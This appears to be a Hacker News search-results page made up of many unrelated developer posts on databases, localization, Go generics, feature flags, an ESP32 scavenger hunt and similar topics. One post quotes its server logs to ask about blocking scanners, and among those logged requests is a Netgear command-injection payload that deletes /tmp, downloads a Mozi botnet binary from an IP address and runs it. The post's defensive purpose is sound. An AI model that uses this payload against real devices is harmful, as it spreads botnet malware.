46 results (0.01 seconds)
- I've helped consult with non-developers about their idea to help them understand what it'll take to implement,
- I'm currently building the control panel (front and back-end) of an embedded (ARM-based) wifi access point,
- I'm planning educational workshops for our community to learn (cram) on different technologies and how they can be quickly used for different benefits,
- I read approximately 600+ different articles, blog entries, and stories each month about what the tech world is doing. (I'm pretty informed!)
- I understand good design from bad design. Aesthetics are not lost on me.
- I have a family (two kids) and juggle a hectic work-life balance (volunteering, full-time gig, forming a startup, social life?) that's gradually improving.
If you're interested, there's some more information about me at http://nobulb.com/personas/.
So if there's something I can help you with, just ask here or @mikegreenberg on Twitter. Be specific about what you're trying to fix/solve/accomplish. The more details you provide, the better I can help you out. Also, I should be able to do your request within 10-15 minutes (a soft time limit so I can spread the love a little quicker).
Last time, the response was overwhelming and I was still answering questions days later (because I wanted to). If you want to get your question answered sooner (rather than later) your request should be thoughtful, sincere, researched and considerate of other people who might want help, too.
Cheers!
PS: This is how it went last few times I did this:
http://news.ycombinator.com/item?id=2767448
http://news.ycombinator.com/item?id=2649226
http://news.ycombinator.com/item?id=2544886
PPS: I'm not asking for anything in return, however, there IS one way you could show your appreciation if you felt the need. I'm working on a project and currently doing some validation. If you would consider taking a short 2-minute survey, I would be quite appreciative.
Survey: http://idjump.wufoo.com/forms/online-identity-and-you/
Followup in two days
Followup on November 23rd at 3pm
Remind me about my dentist appointment at 3.30pm on December 12th 2008
Clearly there can be lots of subtle variations on what exactly gets entered in these sort of scenarios which makes for a potentially tricky/interesting problem.
Listening to a podcast recently, Joel Spolsky mentioned that people with no knowledge of compilers would tend to tackle a parsing problem like this the 'hard way' (ie using regexes, searching strings etc) while they may be better using a lexer/compiler approach. I have no knowledge of compilers, so my thinking right now is to scan for keywords and then things that look like dates using regexes.
Has anyone implemented anything that does this sort of this command processing and have any tips or tools to share? My application is in Rails, but I am willing to experiment - I just don't want to have many hundreds of lines of code testing for all sorts of strange conditions making for a brittle maintenance nightmare!
The land is located 35-miles from downtown Chicago and 25 miles from O'Hare airport. It's smack-dab in the middle of suburbia and there is a Menards within walking distance. http://goo.gl/6tjC8g
If the idea is interesting enough, I'll even build you a shed or a cabin (out of 2x4s; nothing fancy).
The land will include the following amenities, all of which is available at no cost (for really cool projects).
--well water (within reason)
--septic field
--electricity (within reason)
--wifi
--fenced and unfenced acreage
Starting next year, there will be bees, flowers, goats, chickens, dogs, and alpaca on the land. And very likely a mini-donkey, to keep the coyotes at bay.
Feel free to suggest anything you actually want to implement. Or just suggest ideas that others may want to run with. Other than providing power and internet, I don't have the time to help with anything else.
Some ideas my wife and I have come up with:
--real-life Farmville with wifi robots
--tiny, automated combines
--experimental wind turbine development
--cubesat ground stations (not really ag-related, but still cool)
--goat-milking bots
This is no strings attached. We just want to encourage really interesting technical-agricultural projects. Let a thousand flowers bloom.
Almost a year ago, I introduced Paradict [1], my take on multi-format streaming serialization. Given its readability, the Paradict text format appears de facto as an interesting data format for config files. But using Paradict to manage config files would end up cluttering its programming interface and making it confusing for users who still have choices of alternative libraries (TOML, INI File, etc.) dedicated to config files. So I used Paradict as a dependency for KvF (Key-value file format) [2], a new project of mine that focuses on config files with sections.
With its compact binary format, I thought Paradict would be an efficient dependency for a new project that would rely on I/O functions (such as Open, Read, Write, Seek, Tell and Close) to implement a minimalistic yet reliable persistence solution. But that was before I learned that "files are hard" [3]. SQLite with its transactions, BLOB data type and incremental I/O for BLOBs seemed like the right giant to stand on for my new project.
Jinbase started small as a key-value store and ended up as a multi-model embedded database that pushes the boundaries of what we usually do with SQLite. The first transition to the second data model (the depot) happened when I realized that the key-value store was not well suited for cases where a unique identifier is supposed to be automatically generated for each new record, saving the user the burden of providing an identifier that could accidentally be subject to a collision and thus overwrite an existing record. After that, I implemented a search capability that accepts UID ranges for the depot store, timespans (records are automatically timestamped) for both the depot and key-value stores and GLOB patterns and number ranges for string and integer keys in the key-value store.
The queue and stack data models emerged as solutions for use cases where records must be consumed in a specific order. A typical record would be retrieved and deleted from the database in a single transaction unit.
Since SQLite is used as the storage engine, Jinbase supports the relational model de facto. For convenience, all tables related to Jinbase internals are prefixed with "jinbase_", making Jinbase a useful tool for opening legacy SQLite files to add new data models that will safely coexist with the ad hoc relational model.
All four main data models (key-value, depot, queue, stack) support Paradict-compatible data types, such as dictionaries, strings, binary data, integers, datetimes, etc. Under the hood, when the user initiates a write operation, Jinbase serializes (except for binary data), chunks, and stores the data iteratively. A record can be accessed not only in bulk, but also with two levels of partial access granularity: the byte-level and the field-level.
While SQLite's incremental I/O for BLOBs is designed to target an individual BLOB column in a row, Jinbase extends this so that for each record, incremental reads cover all chunks as if they were a single unified BLOB. For dictionary records only, Jinbase automatically creates and maintains a lightweight index consisting of pointers to root fields, which then allows extracting from an arbitrary record the contents of a field automatically deserialized before being returned.
The most obvious use cases for Jinbase are storing user preferences, persisting session data before exit, order-based processing of data streams, exposing data for other processes, upgrading legacy SQLite files with new data models and bespoke data persistence solutions.
Jinbase is written in Python, is available on PyPI and you can play with the examples on the README.
Let me know what you think about this project.
[1] https://news.ycombinator.com/item?id=38684724
I've recently started logging pings to my services, A LOT of servers ping me constantly checking for things like '.env' and other known vulnerabilities. I currently have a JSON dataset of about 10K entries. It looks like this.
{
"offense": "boaform/admin/formLogin?username=ec8&psd=ec8",
"ipAddress": "125.47.68.164"
},
{
"offense": ".env",
"ipAddress": "52.224.55.198"
},
{
"offense": "setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://115.58.115.18:53153/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1",
"ipAddress": "115.58.115.18"
}
Maybe we don't filter by ip address, and instead filter requests based on known strings (or regex). That's what i'm currently doing. Ex. If request includes '.env'. Blocked!
I'd love to implement a more aggressive strategy. Rather than a reactive one. I'm currently finding myself going through server logs, and adding new 'keywords' to the 'banned list'.
Like a 'ad blocklist' we can use as middleware in our HTTP applications.
If something exists already, kindly point me to a Github.
At some point in the negotiation he blatantly mentioned "I don't trust you, I would like to split payment into monthly installments and be able to cancel anytime, no strings attached". Despite this massive red flag I decided to go through (won't do it again, ever) and we sign a contract with that clause, which turned out to be my lifesaver.
The guy was a complete [REDACTED], we were delivering progress way ahead of time and he was always complaining about one thing or another, and kept adding requirements that were not there, threatening us to dump the whole thing because of the clause.
Two months in we had enough, I called for a meeting with him and his team, then proceeded to invoke the clause on my favor, he was very pissed off to find out that it could actually be used against him, but ¯\_(ツ)_/¯. We parted ways that evening and haven't looked back ever since. So long man, let's never meet again.
proposed is to use a interface. In many cases, it's possible to find an
operation common to all the types to be supported; in the worst case, an empty
interface can be used.
This doesn't satisfy many Go programmers, so a proposal for generic types has
been made, containing the contract keyword:
contract Ordinal(t T) {
t < t
}
So a contract looks basically like an interface, which doesn't require a type
to implement a certain method, but to support the use of certain operations on
it.
When I think of operations and types that apply to them in Go, the following
categories come to my mind:
1. Equality, expressed by == and !=, which is supported by most Go expressions.
2. +, which adds up numbers and concatenates strings.
3. Other operations for arithmetics and comparison: -, *, /, %, <, >, <=, >=.
4. Accessors and qualifiers: . and []
Complaints about the lack of generics in Go are often heard from programmers
that want to implement numeric libraries. They basically want a type, which
support the operations of the first three categories, which are basically the
numeric types: integer, floating point and complex numbers.
So an abstract "numeric" or "number" type could eliminate a lot of the use
cases for contracts. Is this an option being considered? Or isn't there just
any benefit over using the double type for numeric computations?
Eight years ago, I worked in a company that was developing a not-so-small system for lawyers. And it was extremely painful for me as a developer to handle the localization of the app.
The process looked like this:
1. Add many keys to the code like "transport_form_name_input_label," "transport_form_car_input_label," etc.
2. Run some extractor to extract the keys from the code.
3. Open the target language data file in an app called Poeditor
4. Import the extracted keys.
5. Find and translate the new values - This was super painful since there were many untranslated keys, and it was hard to find the new ones.
6. Repeat from step 3 - we were translating to 2 versions of the Czech language because of different customer types.
The most common bug was forgetting some key untranslated because developers always kept this as the last part of the feature task.
Later on, we started to think about how to improve this process so the localization doesn't rely on developers.
However, we found out that designers, project managers, and product managers cannot work with Git, and it's also hard for them to find out which keys are rendered where in the system.
It was impossible to simply transfer the task to those.
So my idea was to enable them to simply click on the strings in the actual translated app, give them simple dialog, and let them translate it exactly in the place where it's rendered.
Four years later, I got to implement this idea as a part of my master's thesis, and later on, I founded Tolgee.
You can quickly deploy Tolgee app with Docker / Docker compose.
It’s fully open-source (Apache-2), we only have one enterprise folder on a different license.
The thing is I am ok with PHP/MySQL. With this app, I want to:
- Learn how to code in MVC architecture.
- Learn to design/implement very basic design using CSS/jQuery (no Photoshop. i am no good at it, and my job does not give me time to learn that)
- Making it scalable (that is it should withstand high traffic). (I am not saying it will receive traffic, but I want to learn to implement it in minimum resources and optimized as far as possible)
Can someone guide me where to go from here for above three? I get roughly 2 hours of time daily after my job and weekends (Sat/Sun) are free. Although I love to spend them with family and friends, but you can consider 11-12 hours free time in weekend.
I want to finish this thing in 2 months. Coding is not too complicated, the thing I want is to implement it with elegance.
Where to start? How to proceed.
for each function,
- first write out its algorithm in comments,
- then implement that.
It seems like that programming style can result in higher-quality code with fewer bugs.
As an example, let's implement a simple "ends_with?" string utility function. The function takes two strings and returns whether the first ends with the second:
bool endsWith( const char* haystack, const char* ending )
Following our new programming style, we first write out its implementation in comments:
bool endsWith( const char* haystack, const char* ending )
{
// find the end of [haystack] and [ending].
// if [haystack] is shorter than [ending] then it can't end with [ending], so return false.
// walk backwards through both strings.
// if a character differs, return false.
// otherwise, [haystack] ends with [ending], so return true.
}
Pretty straightforward. And now we can implement the function in an equally straightforward way:
bool endsWith( const char* haystack, const char* ending )
{
// find the end of [haystack] and [ending].
const char *haystackEnd = haystack;
const char *endingEnd = ending;
while( *haystackEnd )
haystackEnd++;
while( *endingEnd )
endingEnd++;
// if [haystack] is shorter than [ending] then it can't end with [ending], so return false.
if( haystackEnd - haystack < endingEnd - ending )
return false;
// walk backwards through both strings.
while( endingEnd != ending )
{
// if a character differs, return false.
if( *endingEnd != *haystackEnd )
return false;
--endingEnd;
--haystackEnd;
}
// otherwise, [haystack] ends with [ending], so return true.
return true;
}
What is interesting about this style is that the result will usually be simple to read and understand. The key is to write out the function's comments first, not last. Is this a common programming style?
A friend of mine uses this technique in his game engine to great effect. The engine's source code is beautiful, mostly because each algorithm is simple and can be understood by reading clear English.
The assets consist of Javascript files, php templates, handlebars templates etc. I don't want to assume I have control over dns or even the webserver.
What is a good design pattern and version control flow to handle translations?
Should I use "themes" - like folders basically, and do automatic translation of text, and is there a program to do automatic translation of images??
When I push a changeset, some of the views or strings may have changed. What is a good way to detect the diffs, so I can automatically update the translations with Google Translate during the build process and then add issues to the translators to do just the new strings?
Despite the implementation of the basic functionality, there are some unfortunate aspects, in particular functions do not support recursion (I don't know how to implement it). Also, functions don't support return statements, loops don't support break, etc. (these should be possible, I'm just a bit tired ).
Error handling is also sketchy, as there is currently no line number information, making it difficult to locate errors when the program is long. There is also a lack of composite data types (such as objects or arrays).
I would like to share this project with you and welcome any suggestions or contributions to improve it, especially to solve the problem of functions not supporting recursion! If you're interested in implementing these features, feel free to visit my GitHub repository at [Toc](https://github.com/huanguolin/toc) and submit a PR. I welcome discussion and feedback!
About the project
Lambda Quest is a live-coding environment in your browser.
When building Lambda Quest, I decided to go with native in-browser ES6 modules, without any compilation. It's really refreshing to just write modern JS and not have to deal with Webpack.
Scheme + Emscripten
The core of the app is a Scheme interpreter called Gambit. It's originally a C program that was compiled to JavaScript via Emscripten. It runs in a WebWorker and communicates with the main thread via postMessage.
To interact with Scheme, I've added the Monaco Editor. It's the same open-source editor that powers the VSCode. Whenever you edit the Scheme code, and it's syntactically correct, it will re-evaluate it live. So the results will be immediately visible on a Canvas.
Canvas
Speaking of Canvas, the rendering is fully asynchronous. Scheme puts Canvas method calls into an async queue. There's a requestAnimationFrame loop running in the background that picks up any pushes to the queue. This makes animations possible through things like `(sleep 0.5)`.
Web Audio support
In addition to Canvas, I've implemented Web Audio support. So you can live-code music now!
Adding Web Audio wasn't trivial because the Gambit interpreter is running in a Web Worker. So I have to send messages between the worker and the main JS thread to access any browser APIs.
Canvas was easy to implement, because it's mostly procedural calls like `fillRect`, `stroke` etc. So I'm just sending commands from Lisp to JS.
Web Audio, on the other hand, is about creating trees of audio nodes. E.g. you create an Oscillator node and connect it to a Gain node, and finally connect the Gain node to a Destination node (output). Also you can set parameters on each node (e.g. the frequency of an oscillator).
This all means that Scheme needs a way to reference created nodes. However, I cannot send a node directly in a message from JS. Only atomic values like strings and numbers. To circumvent this limitation, I've created a registry of nodes in JS which can be accessed by id.
Scheme, when calling a Web Audio method, provides an id to store the result in. Also if it passes an id in one of the arguments, JavaScript looks it up in the registry and makes the call on the corresponding node.
setTimeout as a Scheme macro
Web Audio is not fun if you can't program timed events for it. E.g. a sequence of notes, or a volume envelope that changes over time. So I had to make the Scheme code asynchronous.
Scheme, just like JavaScript, is single-threaded and "synchronous". It needs a second process to tell it when to run a delayed call to achieve asynchronous behavior.
I've implemented a macro – https://github.com/katspaugh/lambda.quest/blob/main/scheme/w... – (which is btw my first macro ever) to put a Scheme callback in a JS `setTimeout`.
Macros, for me, is such a mind-blowing thing. It was amazing to code one purposefully, to achieve a practical goal.
GitHub API and OAuth
You can save your Scheme creations as gists on GitHub. I've implemented GitHub OAuth with a serverless worker on CloudFlare. The worker, of course, is also written in JS. All my projects are hosted on CloudFlare btw, it's amazing.
Preact
Finally, I've used Preact and HTM for a React-like UI rendering. HTM is basically JS template strings that look like JSX and spit out DOM trees. Pretty neat, although a bit hard to edit.
Github
All the code is open-source (MIT) and can be read on GitHub: https://github.com/katspaugh/lambda.quest
Pull requests and feedback are very welcome. Thanks for reading!
I am working on a fun little React.js project that has been getting more developer interest than I initially expected, and I'm not exactly sure which license is the best for both users and maintainers.
I've created a simple content creator tool with a pretty nice interface, and it's free to anyone with no strings attached. I've noticed that there isn't much in regards to UI editors for React anymore, and the ones that do exist have become vendor locked and have funky tight wording within their licenses.
Now that my little side project has gotten a few views and contributors, I would like to make sure that we have an air-tight license that is in the best interest of both developers, and us contributors and maintainers.
I don't believe in putting "rate limits" and such within basic UI component libraries like a number of React content UI kits out there. But I'd also like to protect our own work from said UI kits forking our own code and then trying to implement those types of terms on their users.
I appreciate everyone's input and opinons!
Thank you in advance :)
One of the features that I am planning to implement later on is limiting amount of votes a user can give per submission. I am guessing I will have to save data in a table where schema would look like username, submissionid, votedupordown and parsing those to allow or disallow access to voting functionality.
One more thing I have in mind is integration of either bing or google maps (depending on whichever gives me the most free queries per month) and SignalR to show in realtime submissions as they come up...
What am I making? I have no idea. This could be nothing or it could be something. Source may be released on github when I'm happy with it, right now it's probably rather messy but I do try to keep it neat.
Your thoughts? Ideas? Suggestions?
Also changed is the INameable interface which now is only a getter for Name and now supports both being a normal string property (getter and setter) property AND also supports redirecting to another property.
In other words, you may have no place for a Name property in your content model, but you want the content to be described by a certain field in the UI when listing. The User class is such an example.
Then you can implement it as such:
string INameable.Name => Username;
public string Username { get; set; }
Oh, and that redirection is done through a very lightweight MSIL disassembler. (NameExpressionParser)
https://github.com/cloudy-cms/Cloudy.CMS
I made this as a little project for myself - I've been a fan of regexes, and found that I'm often the only person around me who has taken the time to learn them, so I find myself writing regexes for other people. I wanted to make this as a way for anyone to harness the power of regex for a lot of common operations, without needed to understand regex, blindly copy-paste regexes from the internet, or implement far less efficient string parsing methods to do what a quick regex could.
The idea is for the entire thing to be language agnostic, and to have an ever-growing list of supported regexes AND supported regexes, expandable by the community, and deployed to any package manager people are willing to support.
Tell me what you think!
Side note: This is my first really "open source" project, so if you see any faux pas for allowing contributions, or license, etc, please please let me know so I can learn and update things.
Briefly, about this implementation:
1. it is a GRUSU-based, but not exactly the GRISU2;
2. for now produces only a raw ASCII representation, e.g. -22250738585072014e-324 without dot and '\0' at the end;
3. compared to Ryu, it significantly less code size and spends less clock cycles per digit, but is slightly inferior in a whole because generates a longer ASCII representation.
Now I would like to get feedback, assess how much this is in demand and collect suggestions for further improvements. For instance, I think that it is reasonable to implement conversion with a specified precision (i.e., with a specified number of digits), but not provide a printf-like interface.
The benchmark source code: https://github.com/leo-yuriev/dtoa-benchmark
The d2a() implementation: https://github.com/leo-yuriev/erthink/blob/master/erthink_d2a.h
The test source code: https://github.com/leo-yuriev/erthink/blob/master/test/d2a.cxx
Any suggestions are welcome!
What common patterns, conventions, or idioms do you use to implement options in your shell scripts?
Examples of options I want to implement:
- [-h | --help] Prints a help message.
- [-t | --target] Points to a directory containing our automated tests.
- [-e | --env] Takes a string URI for the automated tests to run against (e.g. http://localhost:1234 or https://tst.mycloudenv.hn).
- [-q | --quiet] Suppresses output.
Capabilities:
- Long or short options.
- Options can appear in any order.
- Options are properly interpreted anywhere in the command, besides the last position.
- Short options can be concatenated.
Essentially, I want these to be as professional and POSIX compliant as possible [0].
[0] https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html
I wrote this because I wanted a queue with all the bells and whistles - searching, scheduling into the future, observability, and rate limiting - all the things that many modern task queue systems have.
But I didn't want to rewrite my app, which was already using SQS. And I was frustrated that many of the best solutions out there (BullMQ, Oban, Sidekiq) were language-specific.
So I made an SQS-compatible replacement. All you have to do is replace the endpoint using AWS' native library in your language of choice.
For example, the queue works with Celery - you just change the connection string. From there, you can see all of your messages and their status, which is hard today in the SQS console (and flower doesn't support SQS.)
It is written to be pluggable. The queue implementation uses SQLite, but I've been experimenting with RocksDB as a backend and you could even write one that uses Postgres. Similarly, you could implement multiple protocols (AMQP, PubSub, etc) on top of the underlying queue. I started with SQS because it is simple and I use it a lot.
It is written to be as easy to deploy as possible - a single go binary. I'm working on adding distributed and autoscale functionality as the next layer.
Today I have search, observability (via prometheus), unlimited message sizes, and the ability to schedule messages arbitrarily in the future.
In terms of monetization, the goal is to just have a hosted queue system. I believe this can be cheaper than SQS without sacrificing performance. Just as Backblaze and Minio have had success competing in the S3 space, I wanted to take a crack at queues.
I'd love your feedback!
Lightweight UI component tree definition syntax, DOM creation and differential updates using only vanilla JS data structures (arrays, iterators, closures, attribute objects or objects with life cycle functions, closures). By default targets the browser's native DOM, but supports other arbitrary target implementations in a branch-local manner, e.g. to define scene graphs for a canvas element as part of the normal UI tree.
Benefits:
- Use the full expressiveness of ES6 / TypeScript to define user interfaces
- No enforced opinion about state handling, very flexible
- Clean, functional component composition & reuse
- No source pre-processing, transpiling or string interpolation
- Less verbose than HTML / JSX, resulting in smaller file sizes
- Supports arbitrary elements (incl. SVG), attributes and events in uniform, S-expression based syntax
- Supports branch-local custom update behaviors & arbitrary (e.g. non-DOM) target data structures to which tree diffs are applied to
- Suitable for server-side rendering and then "hydrating" listeners and components with life cycle methods on the client side
- Can use JSON for static components (or component templates)
- Optional user context injection (an arbitrary object/value passed to all component functions embedded in the tree)
- Default implementation supports CSS conversion from JS objects for style attribs
- Auto-expansion of embedded values / types which implement the IToHiccup or IDeref interfaces (e.g. atoms, cursors, derived views, streams etc.)
- Only ~5.5KB gzipped
https://news.ycombinator.com/item?id=7535606-can_i_delete_my_skype_account
I think that would be fairly easy to implement and it could be easily made backward compatible by forwarding the old links to the new format. With a dash as separator it’s still possible to select the ID with a double click (at least on my system). I think that would be a great improvement. Thanks!
It's like a CMS but instead of only letting you set static content, you can insert arbitrary logic from the UI, including A/B tests and ML "loops".
I previously built a landing page optimization tool that let marketers define variants of their headline, CTA, cover image, etc, then used a genetic algorithm to find the best combination of them. They used my Chrome extension to define changes on DOM elements based on their unique CSS selector. But this broke when the underlying page changed and didn't work with sites that used CSS modules. Developers hated it.
I took a step back.
The problem I was trying to solve was making the page configurable by marketers in a way that developers liked. I decided to solve it from first principles and this led to Hypertune.
Here's how it works. You define a strongly typed configuration schema in GraphQL, e.g.
type Query {
page(language: Language!, deviceType: DeviceType!): Page!
}
type Page {
headline: String!
imageUrl: String!
showPromotion: Boolean!
benefits: [String!]!
}
enum Language { English, French, Spanish }
enum DeviceType { Desktop, Mobile, Tablet }
Then marketers can configure these fields from the UI using our visual, functional, statically-typed language. The language UI is type-directed so we only show expression options that satisfy the required type of the hole in the logic tree. So for the "headline" field, you can insert a String expression or an If / Else expression that returns a String. If you insert the latter, more holes appear. This means marketers don't need to know any syntax and can't get into invalid states. They can use arguments you define in the schema like "language" and "deviceType", and drop A/B tests and contextual multi-armed bandits anywhere in their logic. We overlay live counts on the logic tree UI so they can see how often different branches are called.
You get the config via our SDK which fetches your logic tree once on initialization (from our CDN) then evaluates it locally so you can get flags or content with different arguments (e.g. for different users) immediately with no network latency. So you can use the SDK on your backend without adding extra latency to every request, or on the frontend without blocking renders. The SDK includes a command line tool that auto-generates code for end-to-end type-safety based on your schema. You can also query your config via the GraphQL API.
If you use the SDK, you can also embed a build-time snapshot of your logic tree in your app bundle. The SDK initializes from this instantly then fetches the latest logic from the server. So it'll still work in the unlikely event the CDN is down. And on the frontend, you can evaluate flags, content, A/B tests, personalization logic, etc, instantly on page load without any network latency, which makes it compatible with static Jamstack sites.
I started building this for landing pages but realized it could be used for configuring feature flags, in-app content, translations, onboarding flows, permissions, rules, limits, magic numbers, pricing plans, backend services, cron jobs, etc, as it's all just "code configuration".
This configuration is usually hardcoded, sprawled across json or yaml files, or in separate platforms for feature flags, content management, A/B testing, pricing plans, etc. So if a PM wants to A/B test new onboarding content, they need a developer to write glue code that stitches their A/B testing tool with their CMS for that specific test, then wait for a code deployment. And at that point, it may not be worth the effort.
The general problem with having separate platforms is that all this configuration naturally overlaps. Feature flags and content management overlap with A/B testing and analytics. Pricing plans overlap with feature flags. Keeping them separate leads to inflexibility and duplication and requires hacky glue code, which defeats the purpose of configuration.
I think the solution is a flexible, type-safe code configuration platform with a strongly typed schema, type-safe SDKs and APIs, and a visual, functional, statically-typed language with analytics, A/B testing and ML built in. I think this solves the problem with having separate platforms, but also results in a better solution for individual use cases and makes new use cases possible.
For example, compared specifically to other feature flag platforms, you get auto-generated type-safe code to catch flag typos and errors at compile-time (instead of run-time), code completion and "find all references" in your IDE (no figuring out if a flag is in kebab-case or camelCase), type-safe enum flags you can exhaustively switch on, type-safe object and list flags, and a type-safe logic UI. You pass context arguments like userId, email, etc, in a type-safe way too with compiler errors if you miss or misspell one. To clean up a flag, you remove it from your query, re-run code generation and fix all the type errors to remove all references. The full programming language under the hood means there are no limits on your flag logic (you're not locked into basic disjunctive normal form). You can embed a build-time snapshot of your flag logic in your app bundle for guaranteed, instant initialization with no network latency (and keep this up to date with a commit webhook). And all your flags are versioned together in a single Git history for instant rollbacks to known good states (no figuring out what combination of flag changes caused an incident).
There are other flexible configuration languages like Dhall (discussed here: https://news.ycombinator.com/item?id=32102203), Jsonnet (discussed here: https://news.ycombinator.com/item?id=19656821) and Cue (discussed here: https://news.ycombinator.com/item?id=20847943). But they lack a UI for nontechnical users, can't be updated at run-time and don't support analytics, A/B testing and ML.
I was actually going to start with a basic language that had primitives (Boolean, Int, String), a Comparison expression and an If / Else. Then users could implement the logic for each field in the schema separately.
But then I realized they might want to share logic for a group of fields at the object level, e.g. instead of repeating "if (deviceType == Mobile) { primitiveA } else { primitiveB }" for each primitive field separately, they could have the logic once at the Page level: "if (deviceType == Mobile) { pageObjectA } else { pageObjectB }". I also needed to represent field arguments like "deviceType" in the language. And I realized users may want to define other variables to reuse bits of logic, like a specific "benefit" which appears in different variations of the "benefits" list.
So at this point, it made sense to build a full, functional language with Object expressions (that have a type defined in the schema) and Function, Variable and Application expressions (to implement the lambda calculus). Then all the configuration can be represented as a single Object with the root Query type from the schema, e.g.
Query {
page: f({ deviceType }) =>
switch (true) {
case (deviceType == DeviceType.Mobile) =>
Page {
headline: f({}) => "Headline A"
imageUrl: f({}) => "Image A"
showPromotion: f({}) => true
benefits: f({}) => ["Ben", "efits", "A"]
}
default =>
Page {
headline: f({}) => "Headline B"
imageUrl: f({}) => "Image B"
showPromotion: f({}) => false
benefits: f({}) => ["Ben", "efits", "B"]
}
}
}
So each schema field is implemented by a Function that takes a single Object parameter (a dictionary of field argument name => value). I needed to evaluate this logic tree given a GraphQL query that looks like:
query {
page(deviceType: Mobile) {
headline
showPromotion
}
}
So I built an interpreter that recursively selects the queried parts of the logic tree, evaluating the Functions for each query field with the given arguments. It ignores fields that aren't in the query so the logic tree can grow large without affecting query performance.
The interpreter is used by the SDK, to evaluate logic locally, and on our CDN edge server that hosts the GraphQL API. The response for the example above would be:
{
"__typename": "Query",
"page": {
"__typename": "Page",
"headline": "Headline A",
"showPromotion": true
}
}
Developers were concerned about using the SDK on the frontend as it could leak sensitive configuration logic, like lists of user IDs, to the browser.
To solve this, I modified the interpreter to support "partial evaluation". This is where it takes a GraphQL query that only provides some of the required field arguments and then partially evaluates the logic tree as much as possible. Any logic which can't be evaluated is left intact.
The SDK can leverage this at initialization time by passing already known arguments (e.g. the user ID) in its initialization query so that sensitive logic (like lists of user IDs) are evaluated (and eliminated) on the server. The rest of the logic is evaluated locally by the SDK when client code calls its methods with the remaining arguments. This also minimizes the payload size sent to the client and means less logic needs to be evaluated locally, which improves both page load and render performance.
The interpreter also keeps a count of expression evaluations as well as events for A/B tests and ML loops, which are flushed back to Hypertune in the background to overlay live analytics on the logic tree UI.
It's been a challenge to build a simple UI given there's a full functional language under the hood. For example, I needed to build a way for users to convert any expression into a variable in one click. Under the hood, to make expression X a variable, we wrap the parent of X in a Function that takes a single parameter, then wrap that Function in an Application that passes X as an argument. Then we replace X in the Function body with a reference to the parameter. So we go from:
if (X) {
Y
} else {
Z
}
to
((paramX) =>
if (paramX) {
Y
} else {
Z
}
)(X)
So a variable is just an Application argument that can be referenced in the called Function's body. And once we have a variable, we can reference it in more than one place in the Function body. To undo this, users can "drop" a variable in one click which replaces all its references with a copy of its value.
Converting X into a variable gets more tricky if the parent of X is a Function itself which defines parameters referenced inside of X. In this case, when we make X a variable, we lift it outside of this Function. But then it doesn't have access to the Function's parameters anymore. So we automatically convert X into a Function itself which takes the parameters it needs. Then we call this new Function where we originally had X, passing in the original parameters. There are more interesting details about how we lift variables to higher scopes in one click but that's for another post.
Thanks for reading this far! I'm glad I got to share Hypertune with you. I'm curious about what use case appeals to you the most. Is it type-safe feature flags, in-app content management, A/B testing static Jamstack sites, managing permissions, pricing plans or something else? Please let me know any thoughts or questions!
It was based around esp32 chips and bluetooth devices and old AM radios. I wrote alot of esp32 code for it and it all took way too long for me to implement but it was fun.
Before the hunt begins......
The idea was it would be played in the local park at night time. As we are driving to the park, I turn on the AM radio in the car. At a certain time, I push a bluetooth LE button which activates an ESP32 to play a sound clip over the car radio saying "Emergency! We interrupt this broadcast - an alien spacecraft has crashed! You must find it and rescue the aliens!"
How the hunt works:
The kids are each given a BlueTooth BLE button to search for crashed UFO parts and aliens and weird alien technology. The kids search the park with the BLE buttons and when they are near a treasure, the lights start flashing and alien messages are played through the AM radio. https://www.aliexpress.com/item/1005004985105723.html At each treasure location hidden in the dark there is an esp32 connected to a string of led lights cut from Christmas tree led light string, and also connected to an AM radio. The esp32 is running a sketch using Neil Kolban's BLE scanner, searching for the device ID of the BLE buttons. When the BLE buttons are in range of the hidden Alien UFO parts, (about 15 feet) the esp32 blinks the leds and plays sci fi audio clips using an AM radio signal generator http://bitluni.net/am-radio-transmitter/
The missions:
The scavenger hunt starts in the middle of the park. I used an old briefcase and inside it are six mission briefing envelopes. Each mission briefing envelop contains an audio greeting card playback device, upon which I recorded a mission briefing for each of the treasure hunts described below. The audio playback devices are light sensitive so they start playing their sound when they are pulled out of the mission envelopes: https://www.aliexpress.com/item/32930873811.html
Treasures to be found include:
Treasure #1 -24 glow in the dark aliens https://www.thepartycupboard.com.au/products/glow-in-the-dark-aliens Aliens are hidden throughout the park, their locations marked with these tiny individual battery powered leds https://www.lightinthebox.com/en/p/6pcs-led-balloon-lights-mini-luminous-ballon-lamps-for-paper-lantern-bar-christmas-wedding-party-decoration_p7574222.html
Treasure #2 - https://www.aliexpress.com/item/1005004767224293.html flashing led light energy cubes. When the kids bring them back to base they are dropped into a nuclear reactor's water (i.e. a bucket with water in it) and they activate, flashing. Radioactive UFO parts are covered with glow in the dark sand https://www.aliexpress.com/item/1005004628971176.html
Treasure #3 - glow in the dark spiders https://www.aliexpress.com/item/1005002863141919.html these are the enemies of the aliens and have followed them through space to earth. The kids must capture the spiders, and must eat the spider eggs (jaffa orange round chocolates) so the spider don't breed any more.
Treasure #4 - helium balloons, which the aliens will use to return to their mothership in orbit. At the end of the treasure hunt the kids attach the aliens to helium balloons and return them to space by releasing the balloons.
At the end of the mission the kids have to drop all the treasures into an old rice cooker which I told them was a nuclear reactor. I had put dry ice in it. Then they had to pour water on top, releasing clouds of mist from the reactor, strangely lit by the flashing ice cube leds. This signalled that the kids should release of the balloons carrying the little glow in the dark aliens and battery powered leds, sending the aliens back home and ending the adventure.
So I get those returned as well, effectively doubling the number of results, half of them irrelevant.
Current search filters only allow to filter by "Stories" or "Comments".
Desired solution: Add another filter "Title only" to exclude searching the OP post or comments for (partially) matching strings.
This seems simple to implement, and would also be a big win performance wise, since the search space is at least an order of magnitude smaller, given the fact that the actual posts/comments themselves are much longer than titles.